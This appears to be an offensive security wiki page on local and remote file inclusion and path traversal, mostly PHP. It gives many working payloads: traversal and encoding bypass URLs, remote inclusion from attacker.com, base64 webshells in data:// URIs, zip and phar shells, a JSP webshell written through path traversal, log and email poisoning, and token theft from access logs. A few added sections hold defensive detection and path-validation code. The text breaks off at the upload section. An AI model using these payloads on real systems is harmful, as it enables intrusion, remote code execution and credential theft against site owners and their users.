File Inclusion/Path traversal



File Inclusion

Remote File Inclusion (RFI): The file is loaded from a remote server (best case: you can write the code and the server will execute it). In PHP this is disabled by default (allow_url_include).
Local File Inclusion (LFI): The server loads a local file.

The vulnerability occurs when the user can control in some way the file that is going to be loaded by the server.

Vulnerable PHP functions: require, require_once, include, include_once

A useful tool to exploit this vulnerability: https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

```bash
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
```

Linux

Mixing several *nix LFI lists and adding more paths I have created this one:

Auto_Wordlists/wordlists/file_inclusion_linux.txt at main · carlospolop/Auto_Wordlists · GitHub

Try also to change / for \
Try also to add ../../../../../

A list that uses several techniques to find the file /etc/passwd (to check if the vulnerability exists) can be found here

Windows

Merge of different wordlists:

Auto_Wordlists/wordlists/file_inclusion_windows.txt at main · carlospolop/Auto_Wordlists · GitHub

Try also to change / for \
Try also to remove C:/ and add ../../../../../

A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found here

OS X

Check the LFI list of linux.

Basic LFI and bypasses

All the examples are for Local File Inclusion but could be applied to Remote File Inclusion too (page=http://myserver.com/phpshellcode.txt).

```url
http://example.com/index.php?page=../../../etc/passwd
```

Traversal sequences stripped non-recursively

```url
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```

Null byte (%00)

Bypass the appending of more chars at the end of the provided string (bypass of: $_GET['param']."php")

```url
http://example.com/index.php?page=../../../etc/passwd%00
```

This is solved since PHP 5.4

Encoding

You could use non-standard encodings like double URL encode (and others):

```url
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```

From existing folder

Maybe the back-end is checking the folder path:

```url
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
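The bypasses above all defeat a filter that inspects the parameter once. As an added defensive example (not part of the original page), the Python below normalises a raw request parameter the way a detection rule should: it percent-decodes repeatedly (so %252f and %2f collapse to the same bytes), maps the overlong %c0%af sequence and backslashes to /, and flags null bytes, .. segments, and the ....// shape that only becomes ../ after a single-pass strip. It then runs that check over a few constructed access-log lines built from the payload shapes listed above; the log lines, the naive_strip function and the parameter names are assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Overlong UTF-8 encoding of "/" (the %c0%af form shown above).
OVERLONG_SLASH = re.compile(rb"\xc0\xaf")
# Matches the request target in a combined-format access log line.
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def naive_strip(value: str) -> str:
    """The single-pass filter the bypass above defeats: delete '../' once (assumed)."""
    return value.replace("../", "")


def decode_fully(value: str, max_rounds: int = 3) -> bytes:
    """Percent-decode until the value stops changing (bounded), so single (%2f)
    and double (%252f) encoding end up as the same bytes."""
    data = value.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def traversal_findings(value: str) -> list[str]:
    """Return the traversal indicators present in one raw (still encoded) value."""
    findings: list[str] = []
    data = decode_fully(value)
    if b"\x00" in data:
        findings.append("null-byte")
    if OVERLONG_SLASH.search(data):
        findings.append("overlong-utf8-separator")
        data = OVERLONG_SLASH.sub(b"/", data)
    # Treat backslashes as separators and collapse slash runs ("..////..").
    data = re.sub(rb"/+", b"/", data.replace(b"\\", b"/"))
    segments = data.split(b"/")
    if b".." in segments:
        findings.append("dot-dot-segment")
    if any(re.fullmatch(rb"\.{3,}", seg) for seg in segments):
        findings.append("nested-dot-dot")  # "....//" becomes "../" after one strip
    return findings


def raw_query_values(target: str) -> dict[str, str]:
    """Split the query string without decoding so encoded payloads stay intact
    (parse_qsl would decode once and replace invalid UTF-8 such as %c0%af)."""
    values: dict[str, str] = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            values[key] = val
    return values


def scan_access_log(lines) -> list[tuple[str, str, list[str]]]:
    """Report (location, raw value, findings) for every request path or
    query parameter that carries a traversal indicator."""
    hits = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        target = match.group(1)
        path = urlsplit(target).path
        path_findings = traversal_findings(path)
        if path_findings:
            hits.append(("<path>", path, path_findings))
        for key, val in raw_query_values(target).items():
            findings = traversal_findings(val)
            if findings:
                hits.append((key, val, findings))
    return hits


# Constructed sample log lines (not from any real system), built from the
# payload shapes listed on the page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1" 200 1432',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 1432',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /index.php?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1432',
    '10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /index.php?page=..%c0%af..%c0%afetc%c0%afpasswd HTTP/1.1" 200 1432',
    '10.0.0.5 - - [01/Jan/2024:12:00:05 +0000] "GET /static/%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print("single-pass strip of '....//....//etc/passwd' ->", naive_strip("....//....//etc/passwd"))
    for where, val, findings in scan_access_log(SAMPLE_LOG):
        print(f"{where}={val}: {', '.join(findings)}")
```

The key design point is that the decoding loop and the separator mapping run before any segment test, so a rule written against the decoded bytes catches every encoding variant with one check; the `nested-dot-dot` indicator exists only because a naive filter somewhere may turn `....//` into `../`, which is exactly the case where the input looked harmless to that filter.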

Exploring File System Directories on a Server

The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:

  1. Determine Directory Depth: Ascertain the depth of your current directory by successfully fetching the /etc/passwd file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
```url
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
  2. Probe for Folders: Append the name of the suspected folder (e.g., private) to the URL, then navigate back to /etc/passwd. The additional directory level requires incrementing the depth by one:
```url
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
  3. Interpret the Outcomes: The server's response indicates whether the folder exists:
    • Error / No Output: The folder private likely does not exist at the specified location.
    • Contents of /etc/passwd: The presence of the private folder is confirmed.
  4. Recursive Exploration: Discovered folders can be further probed for subdirectories or files using the same technique or traditional Local File Inclusion (LFI) methods.

To explore directories at different locations in the file system, adjust the payload accordingly. For instance, to check if /var/www/ contains a private directory (assuming the current directory is at a depth of 3), use:

```url
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```

Path Truncation Technique

Path truncation is a method employed to manipulate file paths in web applications. It's often used to access restricted files by bypassing certain security measures that append additional characters to the end of file paths. The goal is to craft a file path that, once altered by the security measure, still points to the desired file.

In PHP, various representations of a file path can be considered equivalent due to the nature of the file system. For instance:

  • /etc/passwd, /etc//passwd, /etc/./passwd, and /etc/passwd/ are all treated as the same path.
  • When the last 6 characters are passwd, appending a / (making it passwd/) doesn't change the targeted file.
  • Similarly, if .php is appended to a file path (like shellcode.php), adding a /. at the end will not alter the file being accessed.

The provided examples demonstrate how to utilize path truncation to access /etc/passwd, a common target due to its sensitive content (user account information):

```url
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```

In these scenarios, the number of traversals needed might be around 2027, but this number can vary based on the server's configuration.

  • Using Dot Segments and Additional Characters: Traversal sequences (../) combined with extra dot segments and characters can be used to navigate the file system, effectively making the server ignore the appended string.
  • Determining the Required Number of Traversals: Through trial and error, one can find the precise number of ../ sequences needed to navigate to the root directory and then to /etc/passwd, ensuring that any appended string (like .php) is neutralized while the desired path (/etc/passwd) remains intact.
  • Starting with a Fake Directory: It's a common practice to begin the path with a non-existent directory (like a/). This technique is used as a precautionary measure or to fulfill the requirements of the server's path parsing logic.

When employing path truncation techniques, it's crucial to understand the server's path parsing behavior and file system structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.

This vulnerability was corrected in PHP 5.3.

Filter bypass tricks

```url
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd

```url
http://example.com/index.php?page=PhP://filter
```

Remote File Inclusion

In PHP this is disabled by default because allow_url_include is Off. It must be On for it to work, and in that case you could include a PHP file from your server and get RCE:

```url
http://example.com/index.php?page=http://attacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```

If for some reason allow_url_include is On, but PHP is filtering access to external webpages, according to this post, you could use for example the data protocol with base64 to decode a b64 PHP code and get RCE:

```url
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```

tip

In the previous code, the final +.txt was added because the attacker needed a string that ended in .txt, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).

Another example not using the php:// protocol would be:

```url
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```

Python Root element

In Python, in code like this:

```python
import os

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```

If the user passes an absolute path to file_name, the previous path is just removed:

```python
>>> import os
>>> os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```

This is the intended behaviour according to the docs:

If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
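As an added example (not from the original page or the Python docs), the snippet below reproduces the os.path.join behaviour just described in unsafe_join and shows the check that prevents it: resolve the candidate with os.path.realpath and verify with os.path.commonpath that it still sits under the base directory. The demo() function builds a throwaway directory tree in which public/escape is a symlink pointing outside the served folder, a case that a purely lexical check (os.path.normpath) would miss; the tree, the file names and the function names are constructed for this example.

```python
import os
import tempfile


def unsafe_join(base: str, user_path: str) -> str:
    """The pattern from the text: os.path.join drops every component before an
    absolute one, so an absolute user_path replaces the base entirely."""
    return os.path.join(base, "public", user_path)


def safe_join(base_dir: str, user_path: str) -> str:
    """Join user_path under base_dir and refuse anything that resolves outside it.

    realpath() canonicalises '..', duplicate separators and symlinks; the
    commonpath check then confirms the result is base_dir or a descendant of it.
    """
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if os.path.isabs(user_path):
        raise ValueError(f"absolute path not allowed: {user_path!r}")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def demo() -> dict[str, bool]:
    """Exercise safe_join on a throwaway tree (constructed for this example):
    public/docs/readme.txt is legitimate, public/escape is a symlink to a
    directory outside the served root."""
    with tempfile.TemporaryDirectory() as tmp:
        public = os.path.join(tmp, "public")
        outside = os.path.join(tmp, "outside")
        os.makedirs(os.path.join(public, "docs"))
        os.makedirs(outside)
        with open(os.path.join(public, "docs", "readme.txt"), "w") as fh:
            fh.write("ok")
        with open(os.path.join(outside, "secret.txt"), "w") as fh:
            fh.write("secret")
        os.symlink(outside, os.path.join(public, "escape"))

        def allowed(requested: str) -> bool:
            try:
                safe_join(public, requested)
                return True
            except ValueError:
                return False

        return {
            "docs/readme.txt": allowed("docs/readme.txt"),
            "docs/../docs/readme.txt": allowed("docs/../docs/readme.txt"),
            "/etc/passwd": allowed("/etc/passwd"),
            "../outside/secret.txt": allowed("../outside/secret.txt"),
            "docs/../../outside/secret.txt": allowed("docs/../../outside/secret.txt"),
            "escape/secret.txt": allowed("escape/secret.txt"),
        }


if __name__ == "__main__":
    print(unsafe_join("/srv/app", "/etc/passwd"))  # '/etc/passwd'
    for requested, ok in demo().items():
        print(f"{requested!r:35} {'allowed' if ok else 'rejected'}")
```

Rejecting absolute input up front is deliberate: silently stripping the leading slash would turn `/etc/passwd` into a lookup for `public/etc/passwd`, which hides the probe from logs instead of surfacing it.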

Java List Directories

It looks like if you have a Path Traversal in Java and you ask for a directory instead of a file, a listing of the directory is returned. This won't happen in other languages (afaik).

Top 25 parameters

Here's a list of the top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI using PHP wrappers & protocols

php://filter

PHP filters allow performing basic modification operations on the data before it is read or written. There are 5 categories of filters:

  • String Filters:
    • string.rot13
    • string.toupper
    • string.tolower
    • string.strip_tags: Remove tags from the data (everything between "<" and ">" chars)
      • Note that this filter has disappeared from modern versions of PHP
  • Conversion Filters
    • convert.base64-encode
    • convert.base64-decode
    • convert.quoted-printable-encode
    • convert.quoted-printable-decode
    • convert.iconv.* : Transforms to a different encoding (convert.iconv.<input_enc>.<output_enc>). To get the list of all the encodings supported run in the console: iconv -l

warning

Abusing the convert.iconv.* conversion filter you can generate arbitrary text, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check LFI2RCE via php filters.

  • Compression Filters
    • zlib.deflate: Compress the content (useful if exfiltrating a lot of info)
    • zlib.inflate: Decompress the data
  • Encryption Filters
    • mcrypt.* : Deprecated
    • mdecrypt.* : Deprecated
  • Other Filters
    • Running in php var_dump(stream_get_filters()); you can find a couple of unexpected filters:
      • consumed
      • dechunk: reverses HTTP chunked encoding
      • convert.*

```php
<?php
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.strip_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example (prints: =C2=A3hellooo=3D)
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compression Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); # To decompress the data locally
# note that the PHP protocol is case-insensitive (you can use "PhP://" and any other variant)
```

warning

The "php://filter" part is case insensitive

Using php filters as oracle to read arbitrary files

In this post a technique is proposed to read a local file without having the output returned from the server. This technique is based on a boolean exfiltration of the file (char by char) using php filters as oracle. This is because php filters can be used to make a text big enough to make php throw an exception.

In the original post you can find a detailed explanation of the technique, but here is a quick summary:

  • Use the codec UCS-4LE to leave the leading character of the text at the beginning and make the size of the string increase exponentially.
  • This will be used to generate a text so big when the initial letter is guessed correctly that php will trigger an error.
  • The dechunk filter will remove everything if the first char is not a hexadecimal, so we can know if the first char is hex.
  • This, combined with the previous one (and other filters depending on the guessed letter), will allow us to guess a letter at the beginning of the text by seeing when we do enough transformations to make it not a hexadecimal character. Because if it is hex, dechunk won't delete it and the initial bomb will make php error.
  • The codec convert.iconv.UNICODE.CP930 transforms every letter into the following one (so after this codec: a -> b). This allows us to discover if the first letter is an a for example, because if we apply this codec 6 times a->b->c->d->e->f->g the letter is no longer a hexadecimal character, therefore dechunk doesn't delete it and the php error is triggered because it multiplies with the initial bomb.
  • Using other transformations like rot13 at the beginning it's possible to leak other chars like n, o, p, q, r (and other codecs can be used to move other letters to the hex range).
  • When the initial char is a number it's needed to base64 encode it and leak the 2 first letters to leak the number.
  • The final problem is to see how to leak more than the initial letter. By using order memory filters like convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE it's possible to change the order of the chars and get in the first position other letters of the text.
  • And in order to be able to obtain further data the idea is to generate 2 bytes of junk data at the beginning with convert.iconv.UTF16.UTF16, apply UCS-4LE to make it pivot with the next 2 bytes, and delete the data until the junk data (this will remove the first 2 bytes of the initial text). Continue doing this until you reach the desired bit to leak.

In the post a tool to perform this automatically was also leaked: php_filters_chain_oracle_exploit.

php://fd

This wrapper allows to access file descriptors that the process has open. Potentially useful to exfiltrate the content of opened files:

```php
<?php
$myfile = fopen("/etc/passwd", "r"); // a file the process already has open (fd 3 here)
echo file_get_contents("php://fd/3");
```

You can also use php://stdin, php://stdout and php://stderr to access the file descriptors 0, 1 and 2 respectively (not sure how this could be useful in an attack)

zip:// and rar://

Upload a Zip or Rar file with a PHPShell inside and access it.
In order to be able to abuse the rar protocol it needs to be specifically activated.

```bash
# $_GET must be escaped, otherwise the shell would expand it to an empty string
echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

# Then include it:
# http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
# http://example.com/index.php?page=rar://shell.jpg%23payload.php
```

data://

```url
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
```

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Note that this protocol is restricted by the php configurations allow_url_open and allow_url_include

expect://

Expect has to be activated. You can execute code using this:

```url
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```

input://

Specify your payload in the POST parameters:

```bash
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
```

phar://

A .phar file can be utilized to execute PHP code when a web application leverages functions such as include for file loading. The PHP code snippet provided below demonstrates the creation of a .phar file:

```php
<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```

To compile the .phar file, the following command should be executed:

```bash
php --define phar.readonly=0 create_path.php
```

Upon execution, a file named test.phar will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.

In cases where the LFI only performs file reading without executing the PHP code within, through functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the phar protocol.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:

Phar Deserialization Exploitation Guide

phar:// deserialization

CVE-2024-2961

It was possible to abuse any arbitrary file read from PHP that supports php filters to get a RCE. The detailed description can be found in this post.
Very quick summary: a 3 byte overflow in the PHP heap was abused to alter the chain of free chunks of a specific size in order to be able to write anything in any address, so a hook was added to call system.
It was possible to alloc chunks of specific sizes abusing more php filters.

More protocols

Check more possible protocols to include here:

  • php://memory and php://temp — Write in memory or in a temp file (not sure how this can be useful in a file inclusion attack)
  • file:// — Accessing local filesystem
  • http:// — Accessing HTTP(s) URLs
  • ftp:// — Accessing FTP(s) URLs
  • zlib:// — Compression Streams
  • glob:// — Find pathnames matching pattern (it doesn't return anything printable, so not really useful here)
  • ssh2:// — Secure Shell 2
  • ogg:// — Audio streams (not useful to read arbitrary files)

LFI via PHP's 'assert'

Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.

For example, PHP code might be designed to prevent directory traversal like so:

```php
assert("strpos('$file', '..') === false") or die("");
```

While this aims to stop traversal, it inadvertently creates a vector for code injection. To exploit this for reading file contents, an attacker could use:

```plaintext
' and die(highlight_file('/etc/passwd')) or '
```

Similarly, for executing arbitrary system commands, one might use:

```plaintext
' and die(system("id")) or '
```

It's important to URL-encode these payloads.

PHP Blind Path Traversal

warning

This technique is relevant in cases where you control the file path of a PHP function that will access a file but you won't see the content of the file (like a simple call to file()) because the content isn't displayed.

In this incredible post it's explained how a blind path traversal can be abused via PHP filter to exfiltrate the content of a file via an error oracle.

As a summary, the technique uses the "UCS-4LE" encoding to make the content of the file so big that the PHP function opening the file will trigger an error.

Then, in order to leak the first char, the filter dechunk is used along with others such as base64 or rot13, and finally the filters convert.iconv.UCS-4.UCS-4LE and convert.iconv.UTF16.UTF-16BE are used to place other chars at the beginning and leak them.

Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

For the technical details check the mentioned post!

LFI2RCE

Arbitrary File Write via Path Traversal (Webshell RCE)

When server-side code that ingests/uploads files builds the destination path using user-controlled data (e.g., filename or URL) without canonicalising and validating it, .. segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell.

Typical exploitation workflow:

  • Identify a write primitive in an endpoint or background worker that accepts a path/filename and writes content to disk (e.g., message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
  • Determine web-exposed directories. Common examples:
    • Apache/PHP: /var/www/html/
    • Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
    • IIS: C:\inetpub\wwwroot\ → drop shell.aspx
  • Craft a traversal path that breaks out of the intended storage directory into the webroot, and include your webshell content.
  • Browse to the dropped payload and execute commands.

Notes:

  • The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
  • On Java stacks, these file writes are often implemented with simple File/Paths concatenation. Lack of canonicalisation/allow-listing is the core flaw.

Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
  <Command Type="SubmitQueueEntry">
    <!-- Write outside the intake folder into the webroot via traversal -->
    <Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
    <Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
  Process p = Runtime.getRuntime().exec(c);
  try (var in = p.getInputStream(); var out = response.getOutputStream()) {
    in.transferTo(out);
  }
}
%>
]]>
    </Data>
  </Command>
</JMF>
```

Hardening measures that prevent this class of bug:

  • Resolve the canonical path and ensure it is a descendant of an allow-listed base directory.
  • Reject any path containing .., absolute roots, or drive letters; prefer generated filenames.
  • Run the writer as a low-privileged account and segregate write directories from served roots.
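The first two hardening points, worked through in Python as an added example (not code from the page or from any product it mentions). The client-supplied name contributes only its extension, which must be on an allow list; the name written to disk is server-generated with secrets.token_hex, and the final destination is canonicalised and checked against the storage root before anything is written. Structural rejections (.. segments, absolute roots, drive letters, backslashes) are reported with a reason so they can be logged rather than silently sanitised. The allow list, the temporary storage directory and the sample names in demo() are assumptions for the example.

```python
import os
import re
import secrets
import tempfile
from typing import Optional

# Constructed allow list for this example; a real service would pick its own.
ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".txt"}
DRIVE_LETTER = re.compile(r"^[A-Za-z]:")


def reject_reason(supplied_name: str) -> Optional[str]:
    """Return why a client-supplied file name must be refused, or None if it
    passes the structural checks (no '..', no absolute root, no drive letter)."""
    if not supplied_name or "\x00" in supplied_name:
        return "empty or NUL byte"
    if supplied_name.startswith(("/", "\\")) or DRIVE_LETTER.match(supplied_name):
        return "absolute path or drive letter"
    if "\\" in supplied_name:
        return "backslash separator"
    segments = supplied_name.split("/")
    if ".." in segments:
        return "parent directory segment"
    if any(seg in ("", ".") for seg in segments):
        return "empty or dot segment"
    return None


def plan_upload_write(storage_root: str, supplied_name: str) -> str:
    """Return the canonical destination for an upload.

    The client's name contributes only its (allow-listed) extension; the name
    written to disk is random, and the final path is canonicalised and checked
    against the storage root before anything is written.
    """
    reason = reject_reason(supplied_name)
    if reason:
        raise ValueError(f"rejected {supplied_name!r}: {reason}")
    ext = os.path.splitext(supplied_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"rejected {supplied_name!r}: extension {ext!r} not allowed")
    generated = secrets.token_hex(16) + ext
    root = os.path.realpath(storage_root)
    destination = os.path.realpath(os.path.join(root, generated))
    # Belt and braces: a generated name cannot traverse, but verify anyway.
    if os.path.commonpath([root, destination]) != root:
        raise RuntimeError("destination escaped the storage root")
    return destination


def demo() -> dict[str, str]:
    """Run the checks against names shaped like those in the text (constructed)."""
    results: dict[str, str] = {}
    with tempfile.TemporaryDirectory() as storage:
        for name in (
            "report.pdf",
            "../../../webapps/ROOT/shell.jsp",
            "/var/www/html/shell.php",
            "C:\\inetpub\\wwwroot\\shell.aspx",
            "shell.jsp",
        ):
            try:
                dest = plan_upload_write(storage, name)
                results[name] = "write to " + os.path.relpath(dest, os.path.realpath(storage))
            except ValueError as exc:
                results[name] = str(exc)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r:40} -> {outcome}")
```

Because the on-disk name never contains client input, the traversal payload shown in the XML example above cannot influence where the file lands even if a check is later weakened; the third hardening point (a low-privileged writer whose directory is not a served root) is an operating-system and deployment matter rather than application code.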

Remote File Inclusion

Explained previously, follow this link.

Via Apache/Nginx log file

If the Apache or Nginx server is vulnerable to LFI inside the include function you could try to access /var/log/apache2/access.log or /var/log/nginx/access.log, set inside the user agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?> and include that file

warning

Note that if you use double quotes for the shell instead of simple quotes, the double quotes will be modified for the string "quote;", PHP will throw an error there and nothing else will be executed.

Also, make sure you write the payload correctly or PHP will error every time it tries to load the log file and you won't have a second opportunity.

This could also be done in other logs but be careful, the code inside the logs could be URL encoded and this could destroy the Shell. The header authorisation "basic" contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.
Other possible log paths:

```text
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
```

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Reading access logs to harvest GET-based auth tokens (token replay)

Many applications mistakenly accept session/auth tokens via GET (e.g., AuthenticationToken, token, sid). If you have a path traversal/LFI primitive to the web server logs, you can steal those tokens from the access logs and replay them to fully bypass authentication.

How-to:

  • Use traversal/LFI to read the web server access log. Common locations:
    • /var/log/apache2/access.log, /var/log/httpd/access_log
    • /var/log/nginx/access.log
  • Some endpoints return file reads Base64-encoded. If so, decode on your machine and inspect the log lines.
  • Use grep to look for GET requests that include the token parameter and capture its value, then replay it against the application entry point.

Example flow (generic):

```http
GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target
```

Decode the body if it is Base64, then replay the captured token:

```http
GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target
```

Notes:

  • Tokens in URLs are logged by default; do not accept bearer tokens via GET in production systems.
  • If the app supports multiple token names, search for common keys such as AuthenticationToken, token, sid, access_token.
  • Rotate any tokens that may have been leaked in logs.

Via Email

Send a mail to an internal account (user@localhost) containing your PHP payload like <?php echo system($_REQUEST["cmd"]); ?> and try to include the mail of the user with a path like /var/mail/<USERNAME> or /var/spool/mail/<USERNAME>

Via /proc/*/fd/*

  1. Upload a lot of shells (for example: 100)
  2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

Via /proc/self/environ

Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file

```http
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```

Via upload

If you can upload a file, just inject the shell payload in it (e.g.: <?php system($_GET['c']); ?> ).

```url
